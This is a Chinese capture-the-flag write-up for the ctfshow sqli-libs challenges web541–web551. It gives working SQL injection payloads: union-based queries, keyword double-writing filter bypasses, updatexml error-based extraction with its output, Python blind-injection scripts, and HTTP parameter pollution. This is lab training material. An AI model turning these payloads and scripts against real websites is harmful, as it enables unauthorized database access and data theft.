ctfshow sqli-libs web541--web551

web541

在这里插入图片描述

and和or 被替换为空格
# 还有   1'   也是不能生效的

?id=-1' union select 1,2,3--+
双写绕过
?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web542

?id=-1 union select 1,2,3--+
没见过这种不要闭合的payload 由于库没变就把闭合换一下就行了
?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web543

在这里插入图片描述

我就不绕（其实不会，试了很多都不行），你当我不会报错嘛

||代替or

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(schema_name))from(infoorrmation_schema.schemata))),3)||'1'='1

不知道大家还记得ctfshow的第一道sql题不
就类似于那个闭合原句应该是差不多

select * from id="'$_GET[id]'"

没写错的话应该就是这个样子

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow'))),3)||'1'='1
XPATH syntax error: '=flags'?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags'))),3)||'1'='1
XPATH syntax error: '=id,flag4s'?id=-1'||updatexml(1,concat(0x3d,(select(flag4s)from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=ctfshow{2bcd1fdb-18f9-480c-a837'?id=-1'||updatexml(1,concat(0x3d,(select(right(flag4s,14))from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=-3c13e46487d4}'

web544

在这里插入图片描述

布尔盲注
这里有个细节我们为了布尔盲注能够正确判断所以最后只能写0如果写1，就恒真，无法判断
在这里插入图片描述

?id=1'aandnd(if(ascii(substr(database(),1,1))=115,1,0))||'0

payload正常写脚本
写这个脚本我是写烦了，忘记加or双写，测试字符的时候括号老是对不上麻了麻了

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web545

在这里插入图片描述

在这里插入图片描述
大小写双写都可以

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://cd991fbf-b4aa-4cda-b583-d8863dff54c7.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web546

用双引号

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((database()),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||"0'url = f'https://2c00bae5-d8ec-40fb-9d48-97bd83f16e00.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||"0'r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web547

在这里插入图片描述

看图?id=0'||(0)||'0"
上脚本

?id=0'||(1)||'0
也可以

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://5352a93c-678c-4cf0-b68e-4a3aaa9d5ca9.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

我做完548倒过来一看不用or绕过了
所以用下题的脚本也是可以的

web548

上题同
nonono
他把or还回来了

?id=0'||(0)||'0
?id=0'||(1)||'0

在这里插入图片描述

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web549

?id=1&id=-1'union select 1,2,3--+?id=1&id=-1'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

这里是一个知识点HPP，也就是HTTP Parameter Pollution，http 参数污染攻击的一个应用。
服务器端有两个部分：第一部分为 tomcat 为引擎的 jsp 型服务器，第二部分为 apache为引擎的 php 服务器，真正提供 web
服务的是 php 服务器。

工作流程为：client 访问服务器,能直接访问到 tomcat 服务器，然后 tomcat 服务器再向 apache
服务器请求数据。数据返回路径则相反。

看图就能正确的知道了
tomat jsp服务端接受第一个参数id,目前实验我所知道的仅为第一个
在这里插入图片描述

而apache php服务端应该是只处理最后一个参数id,所以我们就可以依靠这个来污染参数

web550

双引号闭合即可

?id=1&id=-1"union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web551

?id=1&id=-1") union select 1,(select group_concat(flag4s)from ctfshow.flags),3--+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/364865.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！